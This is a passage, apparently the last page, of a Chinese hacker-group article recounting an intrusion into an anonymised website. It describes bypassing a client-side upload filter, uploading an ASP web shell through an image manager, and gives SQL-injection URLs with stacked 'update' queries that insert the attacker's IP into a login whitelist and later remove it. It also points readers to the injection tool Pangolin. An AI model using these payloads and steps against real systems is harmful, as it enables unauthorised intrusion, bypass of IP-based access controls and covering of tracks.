|
把if(!checkFile(0,"MailFile","htm,html",true)) return false;语句修改成
if(!checkFile(0,"MailFile","htm,html,asp,asa,cer",true)) return false;保存到本地尝试一下(图11)
出现错误!看来这里是没希望了!再凭借着灵感继续找上传,发现资讯中心里的图片管理,可以直接上传ASP。应该是程序员在写程序的时候马虎了(图12)
终于看见了梦寐以求的SHELL界面(图13)
本次入侵的难点在于IP限制登陆、MSSQL数据库服务器和WEB服务器不在一台服务器。
我们运用了update来打破权限配置!把我的IP添加进去了!简单介绍一下本次入侵网站“update”的命令
Update 添加ip:
http://www.XXX.com/qipao/qp1.asp?sid=1&MemberID=8*22;update promiseIP set IpAddress='你的IP' where IpAddress='121.32.*.20X'—
Update 删除ip:
http://www. XXX.com/qipao/qp1.asp?sid=1&MemberID=8*22;update promiseIP set IpAddress='121.32.*.20X' where IpAddress='你的IP'—
121.32.*.20X IP可以在MSSQL数据里找到。
关于Pangolin这款软件:官方最近无法下载,大家可以到紫色贵族的博客下载
|
版权声明:转载请注明来自于“华夏黑客同盟”,否则将追究法律责任。 |
上一页 [1] [2] [3] |
